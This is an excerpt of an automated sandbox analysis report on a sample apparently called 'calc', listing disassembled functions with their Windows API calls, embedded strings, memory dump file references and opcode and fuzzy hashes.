    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: f29f5f1e06620f11fdf18836ee7d66135a7f06a95b8ce2653fe6971efe1d0d26
    • Instruction ID: 2d1a639c7c72d4963f71cf90ae7f89567825e216aa2bbda0b33cc7afab0cf17d
    • Opcode Fuzzy Hash: f29f5f1e06620f11fdf18836ee7d66135a7f06a95b8ce2653fe6971efe1d0d26
    • Instruction Fuzzy Hash: 05A18B311106449FD71CCF18C496B657BE0FF08352F19869EED9A8B2F2C738A985CB44
    Function 004558FF Relevance: 1.5, APIs: 1, Instructions: 26COMMON
    Download Yara Rule
    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006), ref: 00455921
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: 68f1808b20100e82de70a732d53f896afdefe70c9edcaf70261d79a69c1b16a8
    • Instruction ID: 9693ef09c43c1888ae501eb5287d094d7ef636fd7f1e62dc01fc27b31f94f117
    • Opcode Fuzzy Hash: 68f1808b20100e82de70a732d53f896afdefe70c9edcaf70261d79a69c1b16a8
    • Instruction Fuzzy Hash: BEE09B71F04208FBDB00DBB4D845B9E77B89F08329F11016EF915D61D1D678D608465A
    Function 0043738E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
    Download Yara Rule
    APIs
    • GetUserNameW.ADVAPI32(?,?), ref: 004373A0
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: NameUser
    • String ID:
    • API String ID: 2645101109-0
    • Opcode ID: d99580a7dd0d604ec6faf33ad263533e198e63e0be265b2dd7bc6d0af1978b66
    • Instruction ID: d880028efed86599849788da2d52c74bb48a98584789060e47ac239b482ac81e
    • Opcode Fuzzy Hash: d99580a7dd0d604ec6faf33ad263533e198e63e0be265b2dd7bc6d0af1978b66
    • Instruction Fuzzy Hash: E3C04CB240810CEFCB50CF80CD88ADE77BCAB08301F1010D69245D2150D7745B44BB25
    Function 004422B6 Relevance: .6, Instructions: 646COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d6b2241c1e3ffc818d66f920908f4ab8d64e9886c298b1664484395dfdf5ffcc
    • Instruction ID: cb452ce94aa6b4b57d62bf7a907f1812c9957e08c072f4a2a8389e9e0a8bac5f
    • Opcode Fuzzy Hash: d6b2241c1e3ffc818d66f920908f4ab8d64e9886c298b1664484395dfdf5ffcc
    • Instruction Fuzzy Hash: 75325936E0011EBBEF09CED5CC80DDDBBB3FB88304F558169E610B2661DAB56A16DB40
    Function 00456824 Relevance: .4, Instructions: 357COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0975f5892f5e549899d3a88fcccc993e114b020ddf47f2bca1d14cc41228216c
    • Instruction ID: df1dbaeda81ea60c5014dc966a1e03887f7eb943e26fb73baa63d050f7c57ae7
    • Opcode Fuzzy Hash: 0975f5892f5e549899d3a88fcccc993e114b020ddf47f2bca1d14cc41228216c
    • Instruction Fuzzy Hash: FDC1D270D551599EEF289F94C4453BEBBB5EB05307FAA401BEC42A7283C67C4D8AC70A
    Function 0043E46A Relevance: .3, Instructions: 342COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5c3e497bf58a02ddf4aa815ddf2805acbc557ea3e347f3f4ab32cdf1daf2fa29
    • Instruction ID: cceca580a8967cbb15a73722b464b36da95cc13c2e9811def82fd2c153b8e359
    • Opcode Fuzzy Hash: 5c3e497bf58a02ddf4aa815ddf2805acbc557ea3e347f3f4ab32cdf1daf2fa29
    • Instruction Fuzzy Hash: 59D15B32901219DBCF20EF66C8819DD77A5FF58348F51112BFC16A7291D738ED868B89
    Function 0044D7D4 Relevance: .1, Instructions: 77COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 955673a4e0960d26fe1f61bf3935cae5608d5ce8416ddd6c99d3eadf914ef0d9
    • Instruction ID: 037fad67c0e599306cd01d3065f0ed8850a48917680de54553801d9a836a0176
    • Opcode Fuzzy Hash: 955673a4e0960d26fe1f61bf3935cae5608d5ce8416ddd6c99d3eadf914ef0d9
    • Instruction Fuzzy Hash: 2D21D632900204ABDB14EF69CC858BBBBA5FF44350B0581A9ED559B246E734FA15C7E0
    Function 00407A0B Relevance: 68.7, APIs: 38, Strings: 1, Instructions: 472windowCOMMON
    Download Yara Rule
    APIs
    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00407AAF
    • 6F532980.COMCTL32(00000010,00000010,00000021,00000001,00000001,?), ref: 00407AE9
    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00407B01
    • 6F52C400.COMCTL32(?,?,?,?), ref: 00407B14
    • SendMessageW.USER32(?,0000133D,?,?), ref: 00407B37
    • DestroyCursor.USER32(?), ref: 00407B44
    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00407BAF
    • 6F532980.COMCTL32(00000010,00000010,00000021,00000001,00000001,?), ref: 00407C07
    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00407C1F
    • 6F52C400.COMCTL32(?,000000FF,?,?), ref: 00407C33
    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00407CA1
    • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00407CCD
    • GetClientRect.USER32(?,?), ref: 00407CDE
    • 73A25EE0.USER32(?,?,00000000,00000000), ref: 00407CEF
    • 73A245F0.USER32(?,000000F0,?,?), ref: 00407D21
    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 00407D3D
    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00407D56
    • DeleteObject.GDI32(?), ref: 00407D64
    • DestroyCursor.USER32(?), ref: 00407D72
    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 00407D96
    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 00407DAF
    • DeleteObject.GDI32(?), ref: 00407DBD
    • DestroyCursor.USER32(?), ref: 00407DCB
    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 00407DF1
    • DestroyCursor.USER32(?), ref: 00407E12
    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 00407E2E
    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00407E5B
    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00407E90
    • 6F532980.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 00407EC3
    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 00407EDA
    • 6F532980.COMCTL32(00000020,00000020,00000021,00000000,00000001), ref: 00407EEC
    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 00407F03
    • 6F52C400.COMCTL32(00000000,000000FF,?), ref: 00407F1F
    • 6F52C400.COMCTL32(00000000,000000FF,?), ref: 00407F2C
    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00407F59
    • SendMessageW.USER32(?,00001015,?,?), ref: 00407F6D
    • DestroyCursor.USER32(?), ref: 00407F78
    • DestroyCursor.USER32(?), ref: 00407F7D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$CursorDestroy$C400ExtractF532980Icon$DeleteImageLoadObject$A245ClientRect
    • String ID: 2
    • API String ID: 1754974225-450215437
    • Opcode ID: 7616d5357bccd1d589966a7618f3e4cab2395bfee36716099d5e573509e478a1
    • Instruction ID: 449b1562671becbc228cbc9511108e771962b84d9fc6a796af91ae0424866a09
    • Opcode Fuzzy Hash: 7616d5357bccd1d589966a7618f3e4cab2395bfee36716099d5e573509e478a1
    • Instruction Fuzzy Hash: 0C024571A04219AFDB11CFA4CC84BEE7BB8BF08710F00456AFA15B72D1D778A950CB99
    Function 00438A4D Relevance: 61.7, APIs: 34, Strings: 1, Instructions: 474filepipeprocessCOMMON
    Download Yara Rule
    APIs
    • CreatePipe.KERNEL32(00000004,00000008,?,00000000), ref: 00438AFA
    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00438B12
    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00438B1D
    • DuplicateHandle.KERNEL32(00000000), ref: 00438B20
    • CloseHandle.KERNEL32(?), ref: 00438B3A
    • GetStdHandle.KERNEL32(000000F5), ref: 00438B53
    • CreateFileW.KERNEL32(nul,40000000,00000002,?,00000003,00000080,00000000), ref: 00438B78
    • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00438BA8
    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00438BC0
    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00438BCB
    • DuplicateHandle.KERNEL32(00000000), ref: 00438BCE
    • CloseHandle.KERNEL32(?), ref: 00438BE8
    • GetStdHandle.KERNEL32(000000F4), ref: 00438C01
    • CreateFileW.KERNEL32(nul,40000000,00000002,?,00000003,00000080,00000000), ref: 00438C26
    • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00438C56
    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00438C6E
    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00438C76
    • DuplicateHandle.KERNEL32(00000000), ref: 00438C79
    • CloseHandle.KERNEL32(?), ref: 00438C90
    • GetStdHandle.KERNEL32(000000F6), ref: 00438CA6
    • CreateFileW.KERNEL32(nul,80000000,00000001,?,00000003,00000080,00000000), ref: 00438CCB
    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00438D4E
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000,?,?,?), ref: 00438E7C
    • FreeLibrary.KERNEL32(?,00000087,00000000,000000FF), ref: 00438EAE
    • GetLastError.KERNEL32(00000000,00000000), ref: 00438EC8
    • CloseHandle.KERNEL32(?), ref: 00438EE8
    • CloseHandle.KERNEL32(?), ref: 00438F02
    • CloseHandle.KERNEL32(?), ref: 00438F14
    • CloseHandle.KERNEL32(?), ref: 00438F26
    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00438F40
    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00438F46
    • DuplicateHandle.KERNEL32(00000000), ref: 00438F49
    • CloseHandle.KERNEL32(?), ref: 00438FB4
    • FreeLibrary.KERNEL32(?), ref: 00438FC2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Handle$CurrentProcess$Close$Create$Duplicate$FilePipe$FreeLibrary$DirectoryErrorLast
    • String ID: nul
    • API String ID: 1052312815-2873401336
    • Opcode ID: fb0ca8110307011b3966b68cd7fe26cd4902ef0ea447184f656e575d2f95bcdf
    • Instruction ID: 5ecac8a2e4d5a8aa278cd81c89cbfdd016e4fece34d719861e58e5eb322c122d
    • Opcode Fuzzy Hash: fb0ca8110307011b3966b68cd7fe26cd4902ef0ea447184f656e575d2f95bcdf
    • Instruction Fuzzy Hash: 8E0289B1500349AFDB10DF64CC85ADABBA8BF08304F08556EF919972A2DB38EC45CB59
    Function 0040D33A Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 294windowCOMMON
    Download Yara Rule
    APIs
    • 73A246C0.USER32(?,?,?,?,?), ref: 0040D35E
    • SendMessageW.USER32(?,00000136,?,?), ref: 0040D3BF
    • GetSysColorBrush.USER32(00000005), ref: 0040D3D0
    • GetClientRect.USER32(?,?), ref: 0040D3E0
    • SetViewportOrgEx.GDI32(?,00000000,00000000,?), ref: 0040D3F3
    • FillRect.USER32(?,?,?), ref: 0040D3FD
    • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0040D40B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: RectViewport$A246BrushClientColorFillMessageSend
    • String ID: COMBOBOX$EDIT
    • API String ID: 3121619224-1358951209
    • Opcode ID: 043c5126e85a944e73dacd84f897b30b06e6abef17b4986d2349f146c263d21c
    • Instruction ID: 7f2e2f383ff841e78ad89e21c1573881fd4c20705d22ada392839be075dbe60e
    • Opcode Fuzzy Hash: 043c5126e85a944e73dacd84f897b30b06e6abef17b4986d2349f146c263d21c
    • Instruction Fuzzy Hash: 1CA16A3190020ABBCF219FE8DC88DAF3BB8EB44341F044536F915B21A1D739DD599B69
    Function 00405B07 Relevance: 52.7, APIs: 35, Instructions: 239COMMON
    Download Yara Rule
    APIs
    • GetSysColor.USER32(0000000E), ref: 00405B4A
    • SetTextColor.GDI32(?,00000000), ref: 00405B52
    • GetSysColorBrush.USER32(0000000F), ref: 00405B85
    • GetSysColor.USER32(0000000F), ref: 00405B90
    • SetBkColor.GDI32(?,?), ref: 00405BA7
    • SelectObject.GDI32(?,?), ref: 00405BB4
    • InflateRect.USER32(?,000000FF,000000FF), ref: 00405BD8
    • GetSysColor.USER32(00000010), ref: 00405BE0
    • CreateSolidBrush.GDI32(00000000), ref: 00405BE7
    • FrameRect.USER32(?,?,00000000), ref: 00405BF5
    • DeleteObject.GDI32(00000000), ref: 00405BFC
    • InflateRect.USER32(?,000000FE,000000FE), ref: 00405C40
    • FillRect.USER32(?,00000000,?), ref: 00405C6C
    • 73A245F0.USER32(00000000,000000F0), ref: 00405C92
      • Part of subcall function 0040590B: GetSysColor.USER32(0000000E), ref: 0040592E
      • Part of subcall function 0040590B: SetTextColor.GDI32(?,00000000), ref: 00405936
      • Part of subcall function 0040590B: GetSysColorBrush.USER32(0000000F), ref: 0040596C
      • Part of subcall function 0040590B: GetSysColor.USER32(0000000F), ref: 00405978
      • Part of subcall function 0040590B: GetSysColor.USER32(00000011), ref: 00405999
      • Part of subcall function 0040590B: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004059AB
      • Part of subcall function 0040590B: SelectObject.GDI32(?,00000000), ref: 004059BD
      • Part of subcall function 0040590B: SetBkColor.GDI32(?,?), ref: 004059C5
      • Part of subcall function 0040590B: SelectObject.GDI32(?,?), ref: 004059D4
      • Part of subcall function 0040590B: InflateRect.USER32(?,000000FF,000000FF), ref: 004059F2
      • Part of subcall function 0040590B: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00405A0D
      • Part of subcall function 0040590B: 73A245F0.USER32(?,000000F0), ref: 00405A23
      • Part of subcall function 0040590B: SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00405A3E
      • Part of subcall function 0040590B: GetWindowTextW.USER32(?,00000000,00000001), ref: 00405A59
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Color$Rect$Object$BrushInflateSelectText$A245Create$DeleteFillFrameMessageRoundSendSolidWindow
    • String ID:
    • API String ID: 2276483047-0
    • Opcode ID: 4f13aee74336fa108f33dd642b3ad29b3caf127d4c18ce89039e9331d1cb7dfb
    • Instruction ID: 244f93e74abd21b7a8fd65ac97d11d8a4850837e3841d29fac0a06d5552eaefe
    • Opcode Fuzzy Hash: 4f13aee74336fa108f33dd642b3ad29b3caf127d4c18ce89039e9331d1cb7dfb
    • Instruction Fuzzy Hash: 44811872804629FFDF019FA0ED48EAE7B79FB05322F104626F922A61E1D7799940CF54
    Function 0042C822 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 300windowCOMMON
    Download Yara Rule
    APIs
    • 73A25CF0.USER32(00000000), ref: 0042C856
    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0042C94B
    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0042C988
    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000001), ref: 0042C999
    • CreateWindowExW.USER32(00000001,AutoIt v3,00000000,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0042C9E2
    • GetClientRect.USER32(00000000,?), ref: 0042C9EE
    • CreateWindowExW.USER32(00000000,static,00000000,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0042CA37
    • 73A261E0.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0042CA46
    • GetStockObject.GDI32(00000011), ref: 0042CA50
    • SelectObject.GDI32(00000000,00000000), ref: 0042CA58
    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 0042CA68
    • 73A24620.GDI32(00000000,0000005A), ref: 0042CA71
    • DeleteDC.GDI32(00000000), ref: 0042CA7B
    • CreateFontW.GDI32(00000001,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0042CAA8
    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0042CABF
    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0042CAF2
    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0042CB05
    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0042CB15
    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0042CB43
    • GetStockObject.GDI32(00000011), ref: 0042CB4E
    • SendMessageW.USER32(00000030,00000000), ref: 0042CB5D
    • ShowWindow.USER32(00000004), ref: 0042CB67
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$Create$MessageSend$ObjectRect$Stock$A24620A261AdjustClientDeleteFaceFontInfoParametersSelectShowSystemText
    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
    • API String ID: 2451139936-517079104
    • Opcode ID: b5b166dc0c2d76284fd5c874aeae9062c17b6bc38796301a9816f04c30fa2c9c
    • Instruction ID: 1615eac8dec7ae41765c77f636881bc5689f084a187106bb6c267292153e9747
    • Opcode Fuzzy Hash: b5b166dc0c2d76284fd5c874aeae9062c17b6bc38796301a9816f04c30fa2c9c
    • Instruction Fuzzy Hash: CFB1AF71A00218FFDB249FA5DC89E9F7BB8EB45B15F04815AF600AA191D778DD40CF68
    Function 00436C04 Relevance: 44.0, APIs: 5, Strings: 20, Instructions: 265COMMON
    Download Yara Rule
    APIs
    • __time32.LIBCMT ref: 00436C41
      • Part of subcall function 0044B9D2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00442B13,00000000,00000001,?,?,00000000,?,?,00442BE4,00442E41,00000001,?), ref: 0044B9DB
      • Part of subcall function 0044B9D2: __aulldiv.LIBCMT ref: 0044B9FB
    • CharUpperBuffW.USER32(0043664B,?,00000002,?,00000000), ref: 00436C59
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Time$BuffCharFileSystemUpper__aulldiv__time32
    • String ID: %.2d$%.3d$AppData$Common AppData$Common Desktop$Common Documents$Common Favorites$Common Programs$Common Start Menu$Common Startup$CommonFilesDir$Desktop$Favorites$Personal$ProgramFilesDir$Programs$SOFTWARE\Microsoft\Windows\CurrentVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Start Menu$Startup
    • API String ID: 2161657684-3228076346
    • Opcode ID: 2bdba55f944498e59f839496fb3dbcfcac26731240bf7774beea7e81dfb287c7
    • Instruction ID: 94c72ddd4e8f99876f78adca7abbf7ce8ab67422fd5364023a3b36f69be373fd
    • Opcode Fuzzy Hash: 2bdba55f944498e59f839496fb3dbcfcac26731240bf7774beea7e81dfb287c7
